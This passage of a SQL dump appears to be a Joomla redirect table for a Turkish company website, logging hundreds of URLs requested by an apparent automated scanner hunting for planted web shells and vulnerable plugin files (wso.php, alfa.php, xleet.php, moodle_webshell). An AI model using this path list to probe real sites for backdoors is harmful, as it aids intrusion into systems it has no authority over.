00:00:00',301),(47053,'https://www.3s-technologies.com.tr/tr/libraries/joomla/index.php',NULL,'https://www.3s-technologies.com.tr//libraries/joomla/index.php','',1,0,'2025-09-18 00:34:09','0000-00-00 00:00:00',301),(47054,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/view-source/ioxi-o2.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/view-source/ioxi-o2.php','',1,0,'2025-09-18 00:34:10','0000-00-00 00:00:00',301),(47055,'https://www.3s-technologies.com.tr/tr/wp-admin/classwithtostring.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/classwithtostring.php','',1,0,'2025-09-18 00:34:11','0000-00-00 00:00:00',301),(47056,'https://www.3s-technologies.com.tr/tr/wso112233.php',NULL,'https://www.3s-technologies.com.tr//wso112233.php','',1,0,'2025-09-18 00:34:12','0000-00-00 00:00:00',301),(47057,'https://www.3s-technologies.com.tr/tr/templates/ja_purity/index.php',NULL,'https://www.3s-technologies.com.tr/templates/ja_purity/index.php','',2,0,'2025-09-18 00:34:13','0000-00-00 00:00:00',301),(47058,'https://www.3s-technologies.com.tr/tr/wp-admin/fmadmin.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/fmadmin.php','',1,0,'2025-09-18 00:34:13','0000-00-00 00:00:00',301),(47059,'https://www.3s-technologies.com.tr/tr/bypass.php',NULL,'https://www.3s-technologies.com.tr//bypass.php','',1,0,'2025-09-18 00:34:14','0000-00-00 00:00:00',301),(47060,'https://www.3s-technologies.com.tr/tr/templates/beez3/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez3/index.php','',1,0,'2025-09-18 00:34:16','0000-00-00 00:00:00',301),(47061,'https://www.3s-technologies.com.tr/tr/config.php',NULL,'https://www.3s-technologies.com.tr//config.php','',1,0,'2025-09-18 00:34:17','0000-00-00 00:00:00',301),(47062,'https://www.3s-technologies.com.tr/tr/.well-known/plugins.php',NULL,'https://www.3s-technologies.com.tr//.well-known/plugins.php','',1,0,'2025-09-18 00:34:18','0000-00-00 00:00:00',301),(47063,'https://www.3s-technologies.com.tr/tr/wp-content/themes/index.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/index.php','',1,0,'2025-09-18 00:34:19','0000-00-00 00:00:00',301),(47064,'https://www.3s-technologies.com.tr/tr/upload.php',NULL,'https://www.3s-technologies.com.tr//upload.php','',1,0,'2025-09-18 00:34:19','0000-00-00 00:00:00',301),(47065,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/include.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/core-plugin/include.php','',1,0,'2025-09-18 00:34:20','0000-00-00 00:00:00',301),(47066,'https://www.3s-technologies.com.tr/tr/vendor/composer/about.php',NULL,'https://www.3s-technologies.com.tr//vendor/composer/about.php','',1,0,'2025-09-18 00:34:21','0000-00-00 00:00:00',301),(47067,'https://www.3s-technologies.com.tr/tr/templates/rhuk_solarflare_ii/index.php',NULL,'https://www.3s-technologies.com.tr//templates/rhuk_solarflare_ii/index.php','',1,0,'2025-09-18 00:34:22','0000-00-00 00:00:00',301),(47068,'https://www.3s-technologies.com.tr/tr/wp-admin/dropdown.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/dropdown.php','',1,0,'2025-09-18 00:34:23','0000-00-00 00:00:00',301),(47069,'https://www.3s-technologies.com.tr/tr/templates/protostar/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Protostar/index.php','',1,0,'2025-09-18 00:34:24','0000-00-00 00:00:00',301),(47070,'https://www.3s-technologies.com.tr/tr/wp-content/admin.php',NULL,'https://www.3s-technologies.com.tr//wp-content/admin.php','',1,0,'2025-09-18 00:34:25','0000-00-00 00:00:00',301),(47071,'https://www.3s-technologies.com.tr/tr/templates/rhuk_milkyway/index.php',NULL,'https://www.3s-technologies.com.tr//templates/rhuk_milkyway/index.php','',1,0,'2025-09-18 00:34:26','0000-00-00 00:00:00',301),(47072,'https://www.3s-technologies.com.tr/tr/403.php',NULL,'https://www.3s-technologies.com.tr//403.php','',1,0,'2025-09-18 00:34:27','0000-00-00 00:00:00',301),(47073,'https://www.3s-technologies.com.tr/tr/templates/globy/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Globy/error.php','',1,0,'2025-09-18 00:34:28','0000-00-00 00:00:00',301),(47074,'https://www.3s-technologies.com.tr/tr/sites/default/files/index.php',NULL,'https://www.3s-technologies.com.tr//sites/default/files/index.php','',1,0,'2025-09-18 00:34:29','0000-00-00 00:00:00',301),(47075,'https://www.3s-technologies.com.tr/tr/a.php',NULL,'https://www.3s-technologies.com.tr//a.php','',1,0,'2025-09-18 00:34:30','0000-00-00 00:00:00',301),(47076,'https://www.3s-technologies.com.tr/tr/mod/lanciau/lang/en/lanciau.php',NULL,'https://www.3s-technologies.com.tr//mod/lanciau/lang/en/lanciau.php','',1,0,'2025-09-18 00:34:31','0000-00-00 00:00:00',301),(47077,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/elex/elex.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/elex/elex.php','',1,0,'2025-09-18 00:34:32','0000-00-00 00:00:00',301),(47078,'https://www.3s-technologies.com.tr/tr/akc.php',NULL,'https://www.3s-technologies.com.tr//akc.php','',1,0,'2025-09-18 00:34:33','0000-00-00 00:00:00',301),(47079,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/geu/geu.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/geu/geu.php','',1,0,'2025-09-18 00:34:33','0000-00-00 00:00:00',301),(47080,'https://www.3s-technologies.com.tr/tr/byp.php',NULL,'https://www.3s-technologies.com.tr//byp.php','',1,0,'2025-09-18 00:34:34','0000-00-00 00:00:00',301),(47081,'https://www.3s-technologies.com.tr/tr/templates/protostar/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Protostar/error.php','',1,0,'2025-09-18 00:34:35','0000-00-00 00:00:00',301),(47082,'https://www.3s-technologies.com.tr/tr/wp-content/themes/admin.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/admin.php','',1,0,'2025-09-18 00:34:36','0000-00-00 00:00:00',301),(47083,'https://www.3s-technologies.com.tr/tr/xml.php',NULL,'https://www.3s-technologies.com.tr//xml.php','',1,0,'2025-09-18 00:34:37','0000-00-00 00:00:00',301),(47084,'https://www.3s-technologies.com.tr/tr/wso.php',NULL,'https://www.3s-technologies.com.tr//wso.php','',1,0,'2025-09-18 00:34:38','0000-00-00 00:00:00',301),(47085,'https://www.3s-technologies.com.tr/tr/wp-content/themes/divi/404.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/Divi/404.php','',1,0,'2025-09-18 00:34:39','0000-00-00 00:00:00',301),(47086,'https://www.3s-technologies.com.tr/tr/templates/atomic/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Atomic/error.php','',1,0,'2025-09-18 00:34:40','0000-00-00 00:00:00',301),(47087,'https://www.3s-technologies.com.tr/tr/templates/isis/error.php',NULL,'https://www.3s-technologies.com.tr//templates/isis/error.php','',1,0,'2025-09-18 00:34:41','0000-00-00 00:00:00',301),(47088,'https://www.3s-technologies.com.tr/tr/wp-content/themes/pwnd-themes/archive.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/pwnd-themes/archive.php','',1,0,'2025-09-18 00:34:42','0000-00-00 00:00:00',301),(47089,'https://www.3s-technologies.com.tr/tr/templates/hoxa/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Hoxa/error.php','',1,0,'2025-09-18 00:34:43','0000-00-00 00:00:00',301),(47090,'https://www.3s-technologies.com.tr/tr/templates/begindot/error.php',NULL,'https://www.3s-technologies.com.tr//templates/BeginDot/error.php','',1,0,'2025-09-18 00:34:44','0000-00-00 00:00:00',301),(47091,'https://www.3s-technologies.com.tr/tr/templates/raees/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Raees/index.php','',1,0,'2025-09-18 00:34:45','0000-00-00 00:00:00',301),(47092,'https://www.3s-technologies.com.tr/tr/about.php',NULL,'https://www.3s-technologies.com.tr//about.php','',1,0,'2025-09-18 00:34:45','0000-00-00 00:00:00',301),(47093,'https://www.3s-technologies.com.tr/tr/templates/madeyourweb/error.php',NULL,'https://www.3s-technologies.com.tr//templates/madeyourweb/error.php','',1,0,'2025-09-18 00:34:46','0000-00-00 00:00:00',301),(47094,'https://www.3s-technologies.com.tr/tr/templates/binv/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Binv/error.php','',1,0,'2025-09-18 00:34:47','0000-00-00 00:00:00',301),(47095,'https://www.3s-technologies.com.tr/tr/templates/beez2/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez2/index.php','',1,0,'2025-09-18 00:34:48','0000-00-00 00:00:00',301),(47096,'https://www.3s-technologies.com.tr/tr/.well-known/index.php',NULL,'https://www.3s-technologies.com.tr//.well-known/index.php','',1,0,'2025-09-18 00:34:49','0000-00-00 00:00:00',301),(47097,'https://www.3s-technologies.com.tr/tr/templates/atum/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Atum/error.php','',1,0,'2025-09-18 00:34:50','0000-00-00 00:00:00',301),(47098,'https://www.3s-technologies.com.tr/tr/autoload_classmap.php',NULL,'https://www.3s-technologies.com.tr//autoload_classmap.php','',1,0,'2025-09-18 00:34:51','0000-00-00 00:00:00',301),(47099,'https://www.3s-technologies.com.tr/tr/user.php',NULL,'https://www.3s-technologies.com.tr//user.php','',1,0,'2025-09-18 00:34:52','0000-00-00 00:00:00',301),(47100,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/db.php?u',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/linkpreview/db.php?u','',1,0,'2025-09-18 00:34:53','0000-00-00 00:00:00',301),(47101,'https://www.3s-technologies.com.tr/tr/wp-content/themes/twenty/twenty.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/twenty/twenty.php','',1,0,'2025-09-18 00:34:54','0000-00-00 00:00:00',301),(47102,'https://www.3s-technologies.com.tr/tr/local/index.php',NULL,'https://www.3s-technologies.com.tr//local/index.php','',1,0,'2025-09-18 00:34:55','0000-00-00 00:00:00',301),(47103,'https://www.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/css/colors/coffee/index.php','',1,0,'2025-09-18 00:34:56','0000-00-00 00:00:00',301),(47104,'https://www.3s-technologies.com.tr/tr/moon.php',NULL,'https://www.3s-technologies.com.tr//moon.php','',1,0,'2025-09-18 00:34:57','0000-00-00 00:00:00',301),(47105,'https://www.3s-technologies.com.tr/tr/templates/cassiopeia/index.php',NULL,'https://www.3s-technologies.com.tr//templates/cassiopeia/index.php','',2,0,'2025-09-18 00:34:58','0000-00-00 00:00:00',301),(47106,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/three-column-screen-layout/db.php?u',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/three-column-screen-layout/db.php?u','',1,0,'2025-09-18 00:34:58','0000-00-00 00:00:00',301),(47107,'https://www.3s-technologies.com.tr/tr/fm.php',NULL,'https://www.3s-technologies.com.tr//fm.php','',1,0,'2025-09-18 00:34:59','0000-00-00 00:00:00',301),(47108,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/mar.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/seoplugins/mar.php','',1,0,'2025-09-18 00:35:00','0000-00-00 00:00:00',301),(47109,'https://www.3s-technologies.com.tr/tr/mah/function.php',NULL,'https://www.3s-technologies.com.tr//mah/function.php','',1,0,'2025-09-18 00:35:02','0000-00-00 00:00:00',301),(47110,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/fix/up.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/fix/up.php','',1,0,'2025-09-18 00:35:03','0000-00-00 00:00:00',301),(47111,'https://www.3s-technologies.com.tr/tr/wp-content/themes/pridmag/db.php?u',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/pridmag/db.php?u','',1,0,'2025-09-18 00:35:03','0000-00-00 00:00:00',301),(47112,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/clara/clara.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/clara/clara.php','',1,0,'2025-09-18 00:35:04','0000-00-00 00:00:00',301),(47113,'https://www.3s-technologies.com.tr/tr/alfa.php',NULL,'https://www.3s-technologies.com.tr//alfa.php','',1,0,'2025-09-18 00:35:05','0000-00-00 00:00:00',301),(47114,'https://www.3s-technologies.com.tr/tr/login.php',NULL,'https://www.3s-technologies.com.tr//login.php','',1,0,'2025-09-18 00:35:06','0000-00-00 00:00:00',301),(47115,'https://www.3s-technologies.com.tr/tr/wp-content/themes/newsfeed-theme/bbh.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/newsfeed-theme/bbh.php','',1,0,'2025-09-18 00:35:08','0000-00-00 00:00:00',301),(47116,'https://www.3s-technologies.com.tr/tr/theme/lanciau/lang/en/theme_lanciau.php',NULL,'https://www.3s-technologies.com.tr//theme/lanciau/lang/en/theme_lanciau.php','',1,0,'2025-09-18 00:35:09','0000-00-00 00:00:00',301),(47117,'https://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/filemanager.php',NULL,'https://www.3s-technologies.com.tr//modules/mod_simplefileuploadv1.3/elements/filemanager.php','',1,0,'2025-09-18 00:35:10','0000-00-00 00:00:00',301),(47118,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/phpad/as.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/phpad/as.php','',1,0,'2025-09-18 00:35:11','0000-00-00 00:00:00',301),(47119,'https://www.3s-technologies.com.tr/tr/x.php',NULL,'https://www.3s-technologies.com.tr//x.php','',1,0,'2025-09-18 00:35:11','0000-00-00 00:00:00',301),(47120,'https://www.3s-technologies.com.tr/tr/wp-content/index.php',NULL,'https://www.3s-technologies.com.tr//wp-content/index.php','',1,0,'2025-09-18 00:35:12','0000-00-00 00:00:00',301),(47121,'https://www.3s-technologies.com.tr/tr/templates/atum/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Atum/index.php','',1,0,'2025-09-18 00:35:13','0000-00-00 00:00:00',301),(47122,'https://www.3s-technologies.com.tr/tr/classwithtostring.php',NULL,'https://www.3s-technologies.com.tr//classwithtostring.php','',1,0,'2025-09-18 00:35:14','0000-00-00 00:00:00',301),(47123,'https://www.3s-technologies.com.tr/tr/wp-admin/css/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/css/index.php','',1,0,'2025-09-18 00:35:15','0000-00-00 00:00:00',301),(47124,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/view-ad/ms.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/view-ad/ms.php','',1,0,'2025-09-18 00:35:16','0000-00-00 00:00:00',301),(47125,'https://www.3s-technologies.com.tr/tr/wp-includes/js/index.php',NULL,'https://www.3s-technologies.com.tr//wp-includes/js/index.php','',1,0,'2025-09-18 00:35:17','0000-00-00 00:00:00',301),(47126,'https://www.3s-technologies.com.tr/tr/templates/beez3/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez3/error.php','',1,0,'2025-09-18 00:35:18','0000-00-00 00:00:00',301),(47127,'https://www.3s-technologies.com.tr/tr/templates/hoxa/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Hoxa/index.php','',1,0,'2025-09-18 00:35:18','0000-00-00 00:00:00',301),(47128,'https://www.3s-technologies.com.tr/tr/cah.php',NULL,'https://www.3s-technologies.com.tr//cah.php','',1,0,'2025-09-18 00:35:19','0000-00-00 00:00:00',301),(47129,'https://www.3s-technologies.com.tr/tr/templates/isis/index.php',NULL,'https://www.3s-technologies.com.tr//templates/isis/index.php','',1,0,'2025-09-18 00:35:20','0000-00-00 00:00:00',301),(47130,'https://www.3s-technologies.com.tr/tr/plugins/content/apismtp/setting-api.php',NULL,'https://www.3s-technologies.com.tr//plugins/content/apismtp/setting-api.php','',1,0,'2025-09-18 00:35:21','0000-00-00 00:00:00',301),(47131,'https://www.3s-technologies.com.tr/tr/mah.php',NULL,'https://www.3s-technologies.com.tr//mah.php','',1,0,'2025-09-18 00:35:22','0000-00-00 00:00:00',301),(47132,'https://www.3s-technologies.com.tr/tr/templates/aaika/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Aaika/error.php','',1,0,'2025-09-18 00:35:23','0000-00-00 00:00:00',301),(47133,'https://www.3s-technologies.com.tr/tr/up.php',NULL,'https://www.3s-technologies.com.tr//up.php','',1,0,'2025-09-18 00:35:24','0000-00-00 00:00:00',301),(47134,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/1877.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/dzs-zoomsounds/1877.php','',1,0,'2025-09-18 00:35:25','0000-00-00 00:00:00',301),(47135,'https://www.3s-technologies.com.tr/tr/templates/binv/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Binv/index.php','',1,0,'2025-09-18 00:35:26','0000-00-00 00:00:00',301),(47136,'https://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/about.php',NULL,'https://www.3s-technologies.com.tr//.well-known/acme-challenge/about.php','',1,0,'2025-09-18 00:35:27','0000-00-00 00:00:00',301),(47137,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/cache/cache.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/Cache/Cache.php','',1,0,'2025-09-18 00:35:27','0000-00-00 00:00:00',301),(47138,'https://www.3s-technologies.com.tr/tr/templates/jmart/error.php',NULL,'https://www.3s-technologies.com.tr//templates/JMart/error.php','',1,0,'2025-09-18 00:35:28','0000-00-00 00:00:00',301),(47139,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/db.php?u',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/seoplugins/db.php?u','',1,0,'2025-09-18 00:35:29','0000-00-00 00:00:00',301),(47140,'https://www.3s-technologies.com.tr/tr/templates/cassiopeia/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Cassiopeia/error.php','',2,0,'2025-09-18 00:35:30','0000-00-00 00:00:00',301),(47141,'https://www.3s-technologies.com.tr/tr/.well-known/pki-validation/moon.php',NULL,'https://www.3s-technologies.com.tr//.well-known/pki-validation/moon.php','',1,0,'2025-09-18 00:35:32','0000-00-00 00:00:00',301),(47142,'https://www.3s-technologies.com.tr/tr/wp-admin/maint/ova/index.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/maint/ova/index.php','',1,0,'2025-09-18 00:35:33','0000-00-00 00:00:00',301),(47143,'https://www.3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/aahana/json.php','',1,0,'2025-09-18 00:35:34','0000-00-00 00:00:00',301),(47144,'https://www.3s-technologies.com.tr/tr/wp-content/about.php',NULL,'https://www.3s-technologies.com.tr//wp-content/about.php','',1,0,'2025-09-18 00:35:35','0000-00-00 00:00:00',301),(47145,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/core-econ/uph.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/Core-Econ/upH.php','',1,0,'2025-09-18 00:35:36','0000-00-00 00:00:00',301),(47146,'https://www.3s-technologies.com.tr/tr/wp-content/themes/deeto/login.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/deeto/login.php','',1,0,'2025-09-18 00:35:37','0000-00-00 00:00:00',301),(47147,'https://www.3s-technologies.com.tr/tr/tiny.php',NULL,'https://www.3s-technologies.com.tr//tiny.php','',1,0,'2025-09-18 00:35:38','0000-00-00 00:00:00',301),(47148,'https://www.3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php?u',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/seotheme/db.php?u','',1,0,'2025-09-18 00:35:38','0000-00-00 00:00:00',301),(47149,'https://www.3s-technologies.com.tr/tr/file.php',NULL,'https://www.3s-technologies.com.tr//file.php','',1,0,'2025-09-18 00:35:39','0000-00-00 00:00:00',301),(47150,'https://www.3s-technologies.com.tr/tr/default.php',NULL,'https://www.3s-technologies.com.tr//default.php','',1,0,'2025-09-18 00:35:40','0000-00-00 00:00:00',301),(47151,'https://www.3s-technologies.com.tr/tr/templates/beez5/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Beez5/error.php','',1,0,'2025-09-18 00:35:41','0000-00-00 00:00:00',301),(47152,'https://www.3s-technologies.com.tr/tr/templates/eatoreh/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Eatoreh/index.php','',1,0,'2025-09-18 00:35:42','0000-00-00 00:00:00',301),(47153,'https://www.3s-technologies.com.tr/tr/templates/rhuk_milkyway/error.php',NULL,'https://www.3s-technologies.com.tr//templates/rhuk_milkyway/error.php','',1,0,'2025-09-18 00:35:43','0000-00-00 00:00:00',301),(47154,'https://www.3s-technologies.com.tr/tr/templates/ja-helio-farsi/index.php',NULL,'https://www.3s-technologies.com.tr//templates/ja-helio-farsi/index.php','',1,0,'2025-09-18 00:35:44','0000-00-00 00:00:00',301),(47155,'https://www.3s-technologies.com.tr/tr/wp-admin.php',NULL,'https://www.3s-technologies.com.tr//wp-admin.php','',1,0,'2025-09-18 00:35:45','0000-00-00 00:00:00',301),(47156,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/phpadmin/acp.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/phpadmin/acp.php','',1,0,'2025-09-18 00:35:46','0000-00-00 00:00:00',301),(47157,'https://www.3s-technologies.com.tr/tr/wp-content/themes/about.php',NULL,'https://www.3s-technologies.com.tr//wp-content/themes/about.php','',1,0,'2025-09-18 00:35:46','0000-00-00 00:00:00',301),(47158,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/topxoh/wdr.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/TOPXOH/wDR.php','',1,0,'2025-09-18 00:35:47','0000-00-00 00:00:00',301),(47159,'https://www.3s-technologies.com.tr/tr/templates/aaika/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Aaika/index.php','',1,0,'2025-09-18 00:35:48','0000-00-00 00:00:00',301),(47160,'https://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/index.php',NULL,'https://www.3s-technologies.com.tr//.well-known/acme-challenge/index.php','',1,0,'2025-09-18 00:35:49','0000-00-00 00:00:00',301),(47161,'https://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'https://www.3s-technologies.com.tr//modules/mod_simplefileuploadv1.3/elements/udd.php','',1,0,'2025-09-18 00:35:50','0000-00-00 00:00:00',301),(47162,'https://www.3s-technologies.com.tr/tr/plugins/content/apismtp/wp-domain.php',NULL,'https://www.3s-technologies.com.tr//plugins/content/apismtp/wp-domain.php','',1,0,'2025-09-18 00:35:52','0000-00-00 00:00:00',301),(47163,'https://www.3s-technologies.com.tr/tr/mini.php',NULL,'https://www.3s-technologies.com.tr//mini.php','',1,0,'2025-09-18 00:35:53','0000-00-00 00:00:00',301),(47164,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/init-help/init.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/init-help/init.php','',1,0,'2025-09-18 00:35:54','0000-00-00 00:00:00',301),(47165,'https://www.3s-technologies.com.tr/tr/404.php',NULL,'https://www.3s-technologies.com.tr//404.php','',1,0,'2025-09-18 00:35:55','0000-00-00 00:00:00',301),(47166,'https://www.3s-technologies.com.tr/tr/templates/madeyourweb/index.php',NULL,'https://www.3s-technologies.com.tr//templates/madeyourweb/index.php','',1,0,'2025-09-18 00:35:56','0000-00-00 00:00:00',301),(47167,'https://www.3s-technologies.com.tr/tr/templates/hathor/index.php',NULL,'https://www.3s-technologies.com.tr//templates/hathor/index.php','',1,0,'2025-09-18 00:35:57','0000-00-00 00:00:00',301),(47168,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/hello.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/hello.php','',1,0,'2025-09-18 00:35:58','0000-00-00 00:00:00',301),(47169,'https://www.3s-technologies.com.tr/tr/templates/genius/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Genius/error.php','',1,0,'2025-09-18 00:35:58','0000-00-00 00:00:00',301),(47170,'https://www.3s-technologies.com.tr/tr/templates/atomic/index.php',NULL,'https://www.3s-technologies.com.tr//templates/Atomic/index.php','',1,0,'2025-09-18 00:35:59','0000-00-00 00:00:00',301),(47171,'https://www.3s-technologies.com.tr/tr/shell20211028.php',NULL,'https://www.3s-technologies.com.tr//shell20211028.php','',1,0,'2025-09-18 00:36:00','0000-00-00 00:00:00',301),(47172,'https://www.3s-technologies.com.tr/tr/themes.php',NULL,'https://www.3s-technologies.com.tr//themes.php','',1,0,'2025-09-18 00:36:01','0000-00-00 00:00:00',301),(47173,'https://www.3s-technologies.com.tr/tr/templates/eatoreh/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Eatoreh/error.php','',1,0,'2025-09-18 00:36:02','0000-00-00 00:00:00',301),(47174,'https://www.3s-technologies.com.tr/tr/text.php',NULL,'https://www.3s-technologies.com.tr//text.php','',1,0,'2025-09-18 00:36:03','0000-00-00 00:00:00',301),(47175,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/press/wp-class.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/press/wp-class.php','',1,0,'2025-09-18 00:36:04','0000-00-00 00:00:00',301),(47176,'https://www.3s-technologies.com.tr/tr/function.php',NULL,'https://www.3s-technologies.com.tr//function.php','',1,0,'2025-09-18 00:36:05','0000-00-00 00:00:00',301),(47177,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/wpcall-button/button-image.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/wpcall-button/button-image.php','',1,0,'2025-09-18 00:36:06','0000-00-00 00:00:00',301),(47178,'https://www.3s-technologies.com.tr/tr/templates/rivers/error.php',NULL,'https://www.3s-technologies.com.tr//templates/RiverS/error.php','',1,0,'2025-09-18 00:36:06','0000-00-00 00:00:00',301),(47179,'https://www.3s-technologies.com.tr/tr/wp-includes/id3/index.php',NULL,'https://www.3s-technologies.com.tr//wp-includes/ID3/index.php','',1,0,'2025-09-18 00:36:07','0000-00-00 00:00:00',301),(47180,'https://www.3s-technologies.com.tr/tr/templates/hathor/error.php',NULL,'https://www.3s-technologies.com.tr//templates/hathor/error.php','',1,0,'2025-09-18 00:36:08','0000-00-00 00:00:00',301),(47181,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/index.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/linkpreview/index.php','',1,0,'2025-09-18 00:36:09','0000-00-00 00:00:00',301),(47182,'https://www.3s-technologies.com.tr/tr/content.php',NULL,'https://www.3s-technologies.com.tr//content.php','',1,0,'2025-09-18 00:36:10','0000-00-00 00:00:00',301),(47183,'https://www.3s-technologies.com.tr/tr/.well-known/pki-validation/about.php',NULL,'https://www.3s-technologies.com.tr//.well-known/pki-validation/about.php','',1,0,'2025-09-18 00:36:11','0000-00-00 00:00:00',301),(47184,'https://www.3s-technologies.com.tr/tr/templates/rivers/index.php',NULL,'https://www.3s-technologies.com.tr//templates/RiverS/index.php','',1,0,'2025-09-18 00:36:12','0000-00-00 00:00:00',301),(47185,'https://www.3s-technologies.com.tr/tr/style.php',NULL,'https://www.3s-technologies.com.tr//style.php','',1,0,'2025-09-18 00:36:13','0000-00-00 00:00:00',301),(47186,'https://www.3s-technologies.com.tr/tr/gel4y.php',NULL,'https://www.3s-technologies.com.tr//gel4y.php','',1,0,'2025-09-18 00:36:14','0000-00-00 00:00:00',301),(47187,'https://www.3s-technologies.com.tr/tr/templates/yamato/error.php',NULL,'https://www.3s-technologies.com.tr//templates/Yamato/error.php','',1,0,'2025-09-18 00:36:15','0000-00-00 00:00:00',301),(47188,'https://www.3s-technologies.com.tr/tr/log.php',NULL,'https://www.3s-technologies.com.tr//log.php','',1,0,'2025-09-18 00:36:16','0000-00-00 00:00:00',301),(47189,'https://www.3s-technologies.com.tr/tr/wp-admin/maint/about.php',NULL,'https://www.3s-technologies.com.tr//wp-admin/maint/about.php','',1,0,'2025-09-18 00:36:16','0000-00-00 00:00:00',301),(47190,'https://www.3s-technologies.com.tr/tr/local/moodle_webshell/index.php',NULL,'https://www.3s-technologies.com.tr//local/moodle_webshell/index.php','',1,0,'2025-09-18 00:36:17','0000-00-00 00:00:00',301),(47191,'https://www.3s-technologies.com.tr/tr/.well-known/dropdown.php',NULL,'https://www.3s-technologies.com.tr//.well-known/dropdown.php','',1,0,'2025-09-18 00:36:18','0000-00-00 00:00:00',301),(47192,'https://www.3s-technologies.com.tr/tr/m.php',NULL,'https://www.3s-technologies.com.tr//m.php','',1,0,'2025-09-18 00:36:19','0000-00-00 00:00:00',301),(47193,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/apikey/b1ack.php',NULL,'https://www.3s-technologies.com.tr//wp-content/plugins/apikey/b1ack.php','',1,0,'2025-09-18 00:36:20','0000-00-00 00:00:00',301),(47194,'https://www.3s-technologies.com.tr/tr/xleet.php',NULL,'https://www.3s-technologies.com.tr//xleet.php','',1,0,'2025-09-18 00:36:21','0000-00-00 00:00:00',301),(47195,'https://www.3s-technologies.com.tr/tr/templates/jmart/index.php',NULL,'https://www.3s-technologies.com.tr//templates/JMart/index.php','',1,0,'2025-09-18 00:36:22','0000-00-00 00:00:00',301),(47196,'https://www.3s-technologies.com.tr/tr/modules/ets_whatsapp/security.php',NULL,'https://www.3s-technologies.com.tr//modules/ets_whatsapp/security.php','',1,0,'2025-09-18 00:36:23','0000-00-00 